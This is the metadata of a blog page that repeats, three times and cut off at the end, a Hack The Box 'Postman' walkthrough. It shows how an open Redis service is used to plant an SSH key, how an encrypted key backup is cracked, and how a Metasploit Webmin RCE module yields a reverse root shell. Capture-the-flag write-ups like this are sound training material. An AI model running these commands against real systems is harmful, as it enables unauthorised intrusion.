<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="theme" content="Chirpy v2.7.2"><meta name="generator" content="Jekyll v4.2.0" /><meta property="og:title" content="Hack The Box - Postman" /><meta name="author" content="rizemon" /><meta property="og:locale" content="en_US" /><meta name="description" content="Despite the name of this box, it was nowhere related to Postman! This box was quite weird as I actually jumped straight to root instead of going to user first. Configuration The operating systems that I will be using to tackle this machine is a Kali Linux VM. What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts. 1 $ echo &quot;10.10.10.160 postman.htb&quot; &gt;&gt; /etc/hosts Reconnaissance Using nmap, we are able to determine the open ports and running services on the machine. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ nmap -sV -sT -sC postman.htb Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-09 01:39 EST Nmap scan report for postman.htb (10.10.10.160) Host is up (0.26s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http? 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn&#39;t have a title (text/html; Charset=iso-8859-1). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 269.64 seconds Enumeration Not much can be done with the ssh service as we do not have any credentials on hand so lets come back to it later. As for the http service, maybe we can find some information on it ? Seems like an online portfolio or blog. There isn’t much to look at though so lets brute force the directories. 1 2 3 4 5 6 7 $ gobuster dir -u http://postman.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -q /images (Status: 301) /upload (Status: 301) /css (Status: 301) /js (Status: 301) /fonts (Status: 301) /server-status (Status: 403) /upload seemed interesting but it was just a bunch of images. Seems like a dead end. Lets try expanding our range of ports to scan. 1 2 3 4 5 6 7 8 9 10 11 12 $ nmap -sS -p 1-65535 postman.htb Nmap scan report for postman.htb (10.10.10.160) Host is up (0.26s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6379/tcp open redis 10000/tcp open snet-sensor-mgmt Nmap done: 1 IP address (1 host up) scanned in 4548.36 seconds Ooo 2 more ports appeared! Lets check out the redis service on port 6379. I came across this article on how to get myself a remote shell to the box. The first step was to check if authentication is required. Using nc, I attempted to send a echo command and it was executed successfully. 1 2 3 4 5 6 7 nc -v postman.htb 6379 postman.htb [10.10.10.160] 6379 (?) open echo &quot;Authentication required?&quot; $24 Authentication required? quit +OK As you can see, the redis service echoed back our text. Remember that there was a ssh service running on the box? Lets generate a new ssh key and attempt to write it onto the machine. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: SHA256:TEPWxxvFEd9AoEM+xQGEYHHyVHuUeSugqKuFihcLCf4 root@kali The key&#39;s randomart image is: +---[RSA 3072]----+ | =o===+=O*o | | . B.oo=B oo.| | .+.*o.+ .o| |. .o.. +o . | |o. . S . | |o.... | | .oo.. | |..oE. | |o... | +----[SHA256]-----+ We then have to prepare the public key to be sent to the redis server. 1 $ (echo -e &quot;\n\n&quot;; cat ~/.ssh/id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; foo.txt Using redis-cli, we connect to the redis server and print the current working directory as well as the location of where the database will be saved to. 1 2 3 4 5 6 7 redis-cli -h postman.htb postman.htb:6379&gt; config get dir 1) &quot;dir&quot; 2) &quot;/var/lib/redis/.ssh&quot; postman.htb:6379&gt; config get dbfilename 1) &quot;dbfilename&quot; 2) &quot;authorized_keys&quot; Alright, we are in the correct directory already and the the database will be written to authorized_keys when we save. Next we need to clear the database, write our key into it and then save it. 1 2 3 4 5 6 $ redis-cli -h postman.htb flushall OK $ cat foo.txt | redis-cli -h postman.htb -x set crackit OK $ redis-cli -h postman.htb save OK Now if try to ssh as the redis user using the ssh key we made, 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ssh -i ~/.ssh/id_rsa redis@postman.htb Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Dec 31 09:16:39 2019 from 10.10.XX.XX redis@Postman:~$ Success! Too bad redis wasn’t the user that has the flag :P If we list /home, we see another user called Matt. 1 2 redis@Postman:~$ ls /home Matt Lets see if running ‘LinEnum’ will give us any insights on how to get access to Matt. I will be starting a web server on my machine using the builtin SimpleHTTPServer module in python and use wget to retrieve it. 1 2 3 4 5 $ mkdir httpserver $ cd httpserver $ cp ~/LinEnum.sh . $ python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 1 2 3 4 5 6 7 8 9 10 11 redis@Postman:~$ wget http://10.10.XX.XX/LinEnum.sh --2019-12-31 10:18:04-- http://10.10.XX.XX/LinEnum.sh Connecting to 10.10.XX.XX:80... connected. HTTP request sent, awaiting response... 200 OK Length: 46476 (45K) [text/x-sh] Saving to: ‘LinEnum.sh’ LinEnum.sh 100%[=============================================&gt;] 45.39K 59.1KB/s in 0.8s 2019-12-31 10:18:05 (59.1 KB/s) - ‘LinEnum.sh’ saved [46476/46476] Running LinEnum.sh shows that there is a ssh private key backup in /opt named id_rsa.bak owned by user Matt. Interesting… 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 redis@Postman:~$ ./LinEnum.sh ... [-] Location and Permissions (if accessible) of .bak file(s): -rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak -rw------- 1 root root 695 Aug 25 21:24 /var/backups/group.bak -rw------- 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak -rw------- 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak -rw------- 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak ... redis@Postman:~$ cat /opt/id_rsa.bak redis@Postman:~$ cat /opt/id_rsa.bak -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2 7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6 cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9 1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS 5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6 jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X 0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+ Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw== -----END RSA PRIVATE KEY----- With this private ssh key, we could try to ssh as Matt. 1 2 $ ssh -i id_rsa.bak Matt@postman.htb Enter passphrase for key &#39;id_rsa.bak&#39;: Seems like we need a passphrase. Lets see if we can crack it with john. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ python ssh2john.py id_rsa.bak &gt; matt.hash $ john --wordlist=/usr/share/wordlists/rockyou.txt matt.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press &#39;q&#39; or Ctrl-C to abort, almost any other key for status computer2008 (matt) Warning: Only 2 candidates left, minimum 8 needed for performance. 1g 0:00:00:04 DONE (2019-12-31 05:57) 0.2083g/s 2987Kp/s 2987Kc/s 2987KC/sa6_123..*7¡Vamos! Session completed With the passphrase, lets try to ssh as Matt again. 1 2 3 $ ssh -i id_rsa.bak Matt@postman.htb Enter passphrase for key &#39;id_rsa.bak&#39;: Connection closed by 10.10.10.160 port 22 What is going on? We are immediately getting disconnected. After some trials, I kind of gave up and decided to move on to the next service at port 10000. Hmm lets shift to HTTPS. We are immediately greeted with a login page. Lets try to login using Matt:computer2008 as our credentials. Ooo it seems like a dashboard that monitors the Webmin service. After looking around, there doesn’t seem to be any place where we attack from. Lets see if we can find any exploits using searchsploit. 1 2 3 4 5 6 7 8 9 10 $ searchsploit webmin -------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------- ---------------------------------------- ... Webmin 1.910 - &#39;Package Updates&#39; Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb ... -------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Exploitation Hmm from the nmap results and the dashboard, we can tell that the version of Webmin is 1.910, hence we will use the exploit whose target version is nearest to it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ msfconsole msf5 &gt; use exploit/linux/http/webmin_packageup_rce msf5 exploit(linux/http/webmin_packageup_rce) &gt; set LHOST 10.10.XX.XX LHOST =&gt; 10.10.XX.XX msf5 exploit(linux/http/webmin_packageup_rce) &gt; set RHOSTS postman.htb RHOSTS =&gt; postman.htb msf5 exploit(linux/http/webmin_packageup_rce) &gt; set USERNAME Matt USERNAME =&gt; Matt msf5 exploit(linux/http/webmin_packageup_rce) &gt; set PASSWORD computer2008 PASSWORD =&gt; computer2008 msf5 exploit(linux/http/webmin_packageup_rce) &gt; run *] Started reverse TCP handler on 10.10.XX.XX:1337 [+] Session cookie: 169f13b0b46f82aeea5f5ea57524526f [*] Attempting to execute the payload... [*] Command shell session 2 opened (10.10.XX.XX:4444 -&gt; 10.10.10.160:55156) at 2019-12-31 07:50:17 -0500 There’s no prompt but lets try to upgrade to a tty shell. 1 2 3 4 python -c &#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39; root@Postman:/usr/share/webmin/package-updates/# id id uid=0(root) gid=0(root) groups=0(root) Oh damn! We are already root! Getting both the user and root flags should be no problem now. user.txt(1) 1 2 3 root@Postman:/usr/share/webmin/package-updates/# cat /home/Matt/user.txt cat /home/Matt/user.txt 517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX root.txt 1 2 3 root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt cat /root/root.txt a257XXXXXXXXXXXXXXXXXXXXXXXXXXXX user.txt(2) Turns out sshing as the user isn’t the only way to remotely access it. Running su allowed us login at Matt. 1 2 3 4 redis@Postman:~$ su Matt Password: Matt@Postman:/var/lib/redis$ cat ~/user.txt 517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX Rooted ! Thank you for reading and look forward for more writeups and articles !" /><meta property="og:description" content="Despite the name of this box, it was nowhere related to Postman! This box was quite weird as I actually jumped straight to root instead of going to user first. Configuration The operating systems that I will be using to tackle this machine is a Kali Linux VM. What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts. 1 $ echo &quot;10.10.10.160 postman.htb&quot; &gt;&gt; /etc/hosts Reconnaissance Using nmap, we are able to determine the open ports and running services on the machine. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ nmap -sV -sT -sC postman.htb Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-09 01:39 EST Nmap scan report for postman.htb (10.10.10.160) Host is up (0.26s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) 80/tcp open http? 10000/tcp open http MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn&#39;t have a title (text/html; Charset=iso-8859-1). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 269.64 seconds Enumeration Not much can be done with the ssh service as we do not have any credentials on hand so lets come back to it later. As for the http service, maybe we can find some information on it ? Seems like an online portfolio or blog. There isn’t much to look at though so lets brute force the directories. 1 2 3 4 5 6 7 $ gobuster dir -u http://postman.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -q /images (Status: 301) /upload (Status: 301) /css (Status: 301) /js (Status: 301) /fonts (Status: 301) /server-status (Status: 403) /upload seemed interesting but it was just a bunch of images. Seems like a dead end. Lets try expanding our range of ports to scan. 1 2 3 4 5 6 7 8 9 10 11 12 $ nmap -sS -p 1-65535 postman.htb Nmap scan report for postman.htb (10.10.10.160) Host is up (0.26s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 6379/tcp open redis 10000/tcp open snet-sensor-mgmt Nmap done: 1 IP address (1 host up) scanned in 4548.36 seconds Ooo 2 more ports appeared! Lets check out the redis service on port 6379. I came across this article on how to get myself a remote shell to the box. The first step was to check if authentication is required. Using nc, I attempted to send a echo command and it was executed successfully. 1 2 3 4 5 6 7 nc -v postman.htb 6379 postman.htb [10.10.10.160] 6379 (?) open echo &quot;Authentication required?&quot; $24 Authentication required? quit +OK As you can see, the redis service echoed back our text. Remember that there was a ssh service running on the box? Lets generate a new ssh key and attempt to write it onto the machine. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa. Your public key has been saved in /root/.ssh/id_rsa.pub. The key fingerprint is: SHA256:TEPWxxvFEd9AoEM+xQGEYHHyVHuUeSugqKuFihcLCf4 root@kali The key&#39;s randomart image is: +---[RSA 3072]----+ | =o===+=O*o | | . B.oo=B oo.| | .+.*o.+ .o| |. .o.. +o . | |o. . S . | |o.... | | .oo.. | |..oE. | |o... | +----[SHA256]-----+ We then have to prepare the public key to be sent to the redis server. 1 $ (echo -e &quot;\n\n&quot;; cat ~/.ssh/id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; foo.txt Using redis-cli, we connect to the redis server and print the current working directory as well as the location of where the database will be saved to. 1 2 3 4 5 6 7 redis-cli -h postman.htb postman.htb:6379&gt; config get dir 1) &quot;dir&quot; 2) &quot;/var/lib/redis/.ssh&quot; postman.htb:6379&gt; config get dbfilename 1) &quot;dbfilename&quot; 2) &quot;authorized_keys&quot; Alright, we are in the correct directory already and the the database will be written to authorized_keys when we save. Next we need to clear the database, write our key into it and then save it. 1 2 3 4 5 6 $ redis-cli -h postman.htb flushall OK $ cat foo.txt | redis-cli -h postman.htb -x set crackit OK $ redis-cli -h postman.htb save OK Now if try to ssh as the redis user using the ssh key we made, 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ssh -i ~/.ssh/id_rsa redis@postman.htb Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Dec 31 09:16:39 2019 from 10.10.XX.XX redis@Postman:~$ Success! Too bad redis wasn’t the user that has the flag :P If we list /home, we see another user called Matt. 1 2 redis@Postman:~$ ls /home Matt Lets see if running ‘LinEnum’ will give us any insights on how to get access to Matt. I will be starting a web server on my machine using the builtin SimpleHTTPServer module in python and use wget to retrieve it. 1 2 3 4 5 $ mkdir httpserver $ cd httpserver $ cp ~/LinEnum.sh . $ python -m SimpleHTTPServer 80 Serving HTTP on 0.0.0.0 port 80 ... 1 2 3 4 5 6 7 8 9 10 11 redis@Postman:~$ wget http://10.10.XX.XX/LinEnum.sh --2019-12-31 10:18:04-- http://10.10.XX.XX/LinEnum.sh Connecting to 10.10.XX.XX:80... connected. HTTP request sent, awaiting response... 200 OK Length: 46476 (45K) [text/x-sh] Saving to: ‘LinEnum.sh’ LinEnum.sh 100%[=============================================&gt;] 45.39K 59.1KB/s in 0.8s 2019-12-31 10:18:05 (59.1 KB/s) - ‘LinEnum.sh’ saved [46476/46476] Running LinEnum.sh shows that there is a ssh private key backup in /opt named id_rsa.bak owned by user Matt. Interesting… 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 redis@Postman:~$ ./LinEnum.sh ... [-] Location and Permissions (if accessible) of .bak file(s): -rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak -rw------- 1 root root 695 Aug 25 21:24 /var/backups/group.bak -rw------- 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak -rw------- 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak -rw------- 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak ... redis@Postman:~$ cat /opt/id_rsa.bak redis@Postman:~$ cat /opt/id_rsa.bak -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2 7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6 cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9 1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS 5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6 jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X 0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+ Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw== -----END RSA PRIVATE KEY----- With this private ssh key, we could try to ssh as Matt. 1 2 $ ssh -i id_rsa.bak Matt@postman.htb Enter passphrase for key &#39;id_rsa.bak&#39;: Seems like we need a passphrase. Lets see if we can crack it with john. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $ python ssh2john.py id_rsa.bak &gt; matt.hash $ john --wordlist=/usr/share/wordlists/rockyou.txt matt.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes Cost 2 (iteration count) is 2 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press &#39;q&#39; or Ctrl-C to abort, almost any other key for status computer2008 (matt) Warning: Only 2 candidates left, minimum 8 needed for performance. 1g 0:00:00:04 DONE (2019-12-31 05:57) 0.2083g/s 2987Kp/s 2987Kc/s 2987KC/sa6_123..*7¡Vamos! Session completed With the passphrase, lets try to ssh as Matt again. 1 2 3 $ ssh -i id_rsa.bak Matt@postman.htb Enter passphrase for key &#39;id_rsa.bak&#39;: Connection closed by 10.10.10.160 port 22 What is going on? We are immediately getting disconnected. After some trials, I kind of gave up and decided to move on to the next service at port 10000. Hmm lets shift to HTTPS. We are immediately greeted with a login page. Lets try to login using Matt:computer2008 as our credentials. Ooo it seems like a dashboard that monitors the Webmin service. After looking around, there doesn’t seem to be any place where we attack from. Lets see if we can find any exploits using searchsploit. 1 2 3 4 5 6 7 8 9 10 $ searchsploit webmin -------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) -------------------------------------------------------------------------- ---------------------------------------- ... Webmin 1.910 - &#39;Package Updates&#39; Remote Command Execution (Metasploit) | exploits/linux/remote/46984.rb ... -------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Exploitation Hmm from the nmap results and the dashboard, we can tell that the version of Webmin is 1.910, hence we will use the exploit whose target version is nearest to it. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ msfconsole msf5 &gt; use exploit/linux/http/webmin_packageup_rce msf5 exploit(linux/http/webmin_packageup_rce) &gt; set LHOST 10.10.XX.XX LHOST =&gt; 10.10.XX.XX msf5 exploit(linux/http/webmin_packageup_rce) &gt; set RHOSTS postman.htb RHOSTS =&gt; postman.htb msf5 exploit(linux/http/webmin_packageup_rce) &gt; set USERNAME Matt USERNAME =&gt; Matt msf5 exploit(linux/http/webmin_packageup_rce) &gt; set PASSWORD computer2008 PASSWORD =&gt; computer2008 msf5 exploit(linux/http/webmin_packageup_rce) &gt; run *] Started reverse TCP handler on 10.10.XX.XX:1337 [+] Session cookie: 169f13b0b46f82aeea5f5ea57524526f [*] Attempting to execute the payload... [*] Command shell session 2 opened (10.10.XX.XX:4444 -&gt; 10.10.10.160:55156) at 2019-12-31 07:50:17 -0500 There’s no prompt but lets try to upgrade to a tty shell. 1 2 3 4 python -c &#39;import pty; pty.spawn(&quot;/bin/bash&quot;)&#39; root@Postman:/usr/share/webmin/package-updates/# id id uid=0(root) gid=0(root) groups=0(root) Oh damn! We are already root! Getting both the user and root flags should be no problem now. user.txt(1) 1 2 3 root@Postman:/usr/share/webmin/package-updates/# cat /home/Matt/user.txt cat /home/Matt/user.txt 517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX root.txt 1 2 3 root@Postman:/usr/share/webmin/package-updates/# cat /root/root.txt cat /root/root.txt a257XXXXXXXXXXXXXXXXXXXXXXXXXXXX user.txt(2) Turns out sshing as the user isn’t the only way to remotely access it. Running su allowed us login at Matt. 1 2 3 4 redis@Postman:~$ su Matt Password: Matt@Postman:/var/lib/redis$ cat ~/user.txt 517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX Rooted ! Thank you for reading and look forward for more writeups and articles !" /><link rel="canonical" href="https://rizemon.github.io/posts/postman-htb/" /><meta property="og:url" content="https://rizemon.github.io/posts/postman-htb/" /><meta property="og:site_name" content="rizemon’s blog" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-03-15T11:33:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Hack The Box - Postman" /><meta name="twitter:site" content="@rizemon" /><meta name="twitter:creator" content="@rizemon" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"rizemon"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://rizemon.github.io/posts/postman-htb/"},"description":"Despite the name of this box, it was nowhere related to Postman! This box was quite weird as I actually jumped straight to root instead of going to user first. Configuration The operating systems that I will be using to tackle this machine is a Kali Linux VM. What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts. 1 $ echo &quot;10.10.10.160 postman.htb&quot; &gt;&gt; /etc/hosts Reconnaissance Using nmap, we are able to determine the open ports and running services on the machine. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 $ nmap -sV -sT -sC postman.htb Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-09 01:39 EST Nmap scan report for postman.htb (10.10.10.160) Host is up (0.26s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) |_ 256 